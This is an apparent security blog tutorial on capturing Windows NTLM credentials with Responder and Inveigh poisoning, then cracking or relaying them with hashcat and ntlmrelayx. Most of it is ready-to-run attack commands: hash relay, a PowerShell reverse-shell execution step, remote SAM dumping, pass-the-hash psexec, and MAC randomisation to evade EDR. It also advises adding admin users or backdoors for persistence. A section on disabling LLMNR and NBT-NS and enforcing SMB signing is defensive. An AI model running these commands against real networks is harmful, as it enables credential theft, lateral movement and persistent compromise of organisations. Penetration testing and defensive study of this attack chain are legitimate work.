How Hackers Steal Windows Credentials in Seconds: Responder & NTLM Relay Attack Explained + Video

Listen to this Post

Featured Image

Introduction:

In every penetration test, extracting hashed credentials from a switched network remains a core objective. Attackers often deploy passive listener tools like Responder to poison Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) traffic, forcing Windows machines to send NTLM authentication hashes directly to the attacker’s machine. Understanding this attack chain is critical for blue teams to implement proper spoofing defenses and for red teams to refine their lateral movement tradecraft.

Learning Objectives:

  • Understand how LLMNR/NBT-NS poisoning works and why Windows environments are vulnerable by default.
  • Execute a real-world responder attack to capture NTLMv2 hashes on a compromised subnet.
  • Implement mitigation strategies including disabling LLMNR, enabling SMB signing, and deploying network access controls.

You Should Know:

1. Poisoning the Wire: Responder Setup and Execution

Step‑by‑step guide explaining what this does and how to use it:

Responder is a Python tool that listens on multiple protocols (LLMNR, NBT-NS, MDNS, HTTP, SMB, etc.) and answers name resolution requests that legitimate servers fail to handle. When a Windows host tries to resolve a share like `\\FILESERVER` and no real server responds, Responder replies, forcing the client to send its NTLM hash for authentication.

Linux (Kali/Parrot) commands to install and run Responder:

sudo apt update && sudo apt install responder -y
sudo responder -I eth0 -dwPv

– `-I eth0` : network interface for listening
– `-d` : enable answers for NetBIOS domain suffixes
– `-w` : start WPAD rogue proxy server
– `-P` : force NTLM challenge on HTTP/HTTPS
– `-v` : verbose output

Windows alternative with Inveigh (PowerShell version):

Import-Module .\Inveigh.psd1
Start-Inveigh -ConsoleOutput Y -NBNS Y -LLMNR Y -HTTP Y

What happens after execution: Any user who mistypes a UNC path or visits a nonexistent SMB share will unknowingly send their NetNTLMv2 hash. Responder saves these hashes in /usr/share/responder/logs/. To capture live traffic, watch the console for lines containing

 NTLMv2 hash captured</code>.

<ol>
<li>Cracking or Relaying: Two Paths from Captured Hashes</li>
</ol>

Step‑by‑step guide explaining what this does and how to use it:

Once you have a NetNTLMv2 hash, you can either crack it offline (using hashcat or john) or relay it in real time using ntlmrelayx. Cracking is slow but works for weak passwords; relaying is faster but requires that SMB signing is disabled on the target.

<h2 style="color: yellow;">Extract the hash from Responder’s log:</h2>

[bash]
cat /usr/share/responder/logs/SMB-NTLMv2-192.168.1.20.txt

Crack with hashcat (mode 5600 for NetNTLMv2):

hashcat -m 5600 captured_hash.txt /usr/share/wordlists/rockyou.txt -O

Relay the hash to another machine using ntlmrelayx (from Impacket):

sudo ntlmrelayx.py -tf targets.txt -smb2support

- `-tf targets.txt` : list of IP addresses to relay to
- `-smb2support` : enable SMB 2/3 protocol

Important limitation: Relaying only works if the target does NOT enforce SMB signing. Check with Nmap:

nmap --script smb2-security-mode -p445 192.168.1.0/24

If `message_signing` is `disabled` or false, you can relay.

  1. Exploitation via Relayed Authentication – Gaining a Shell

Step‑by‑step guide explaining what this does and how to use it:

Ntlmrelayx can not only authenticate but also execute commands, dump SAM hashes, or even get a full interactive shell. This turns a passive hash capture into an active compromise.

Generate a reverse shell payload using the relayed session:

sudo ntlmrelayx.py -tf targets.txt -e 'powershell -enc BASE64_ENCODED_REVERSE_SHELL' -smb2support

Alternative – dump SAM database remotely:

sudo ntlmrelayx.py -tf targets.txt --dump-sam -smb2support

For Windows targets without SMB signing, you can also use `psexec` with the captured hash:

impacket-psexec -hashes :NTLM_HASH DOMAIN/[email protected]

After successful relaying, you will see a shell or extracted credentials on your attacker console. To maintain access, add a new admin user or implant a persistent backdoor.

4. Mitigation: Hardening Windows Against LLMNR/NBT-NS Spoofing

Step‑by‑step guide explaining what this does and how to use it:

The most effective defense is disabling LLMNR and NBT-NS via Group Policy. Additionally, enforce SMB signing and use network segmentation.

Disable LLMNR via Group Policy (Windows Server/Pro):

1. Open Group Policy Management Editor

  1. Navigate to: Computer Configuration → Administrative Templates → Network → DNS Client

3. Enable “Turn off multicast name resolution”

4. Apply with `gpupdate /force`

Disable NBT-NS using PowerShell (local machine):

$regPath = "HKLM:\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces"
Get-ChildItem $regPath | ForEach-Object {
Set-ItemProperty -Path $_.PSPath -Name "NetbiosOptions" -Value 2 -Type DWORD
}

- Value `2` disables NetBIOS over TCP/IP; `0` uses DHCP; `1` enables it.

Force SMB signing via PowerShell:

Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" -Name "RequireSecuritySignature" -Value 1 -Type DWORD
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters" -Name "RequireSecuritySignature" -Value 1 -Type DWORD
  1. Advanced Evasion: Responder with WPAD and LLMNR Spoofing

Step‑by‑step guide explaining what this does and how to use it:

When you enable the `-w` flag, Responder starts a fake WPAD (Web Proxy Auto-Discovery) server. Windows machines automatically query for `wpad.dat` – Responder provides a malicious proxy configuration that forces all HTTP traffic through the attacker, capturing credentials for any website that uses Basic or NTLM authentication.

Full command with advanced evasion techniques:

sudo responder -I eth0 -dwPv --ForceProxy -F wpad-scheme-detect

- `--ForceProxy` : redirects all HTTP requests through attacker
- `-F` : forces WPAD to respond even if a valid WPAD server exists

To avoid detection in enterprise EDRs, rotate listening interfaces and use randomized MAC addresses:

sudo macchanger -r eth0
sudo responder -I eth0 -dwPv --no-wpad-rand

During a real engagement, you should also monitor Responder logs for high-value accounts (Domain Admins). When a domain admin sends a hash, switch immediately to relaying to compromise the domain controller.

What Undercode Say:

  • LLMNR and NBT-NS are still enabled by default on most Windows networks, making credential theft trivial for an attacker with local access. Disabling these protocols should be a top hardening priority.
  • Combining Responder with ntlmrelayx transforms a passive listener into a full exploit chain — from hash capture to remote code execution — all without ever needing to crack a password.
  • Many blue teams focus on perimeter defenses but ignore internal name resolution spoofing. Regular internal penetration tests using these techniques often reveal critical vulnerabilities that firewalls cannot stop.

Prediction:

As more organizations adopt Zero Trust Network Access (ZTNA) and IPv6, legacy protocols like LLMNR and NBT-NS will eventually fade. However, in hybrid and on-prem environments, misconfigurations will persist for years. Attackers will continue to abuse name resolution spoofing, but new mitigations like machine certificate authentication (PKINIT) and mandatory SMB signing will slowly raise the cost of these attacks. Expect to see automated EDR sensors that actively detect spoofed name responses by cross‑checking DHCP logs and DNS signatures. Until then, every penetration testing team should have Responder and ntlmrelayx ready in their toolkit.

▶️ Related Video (82% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Infosec Cybersecurity - Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky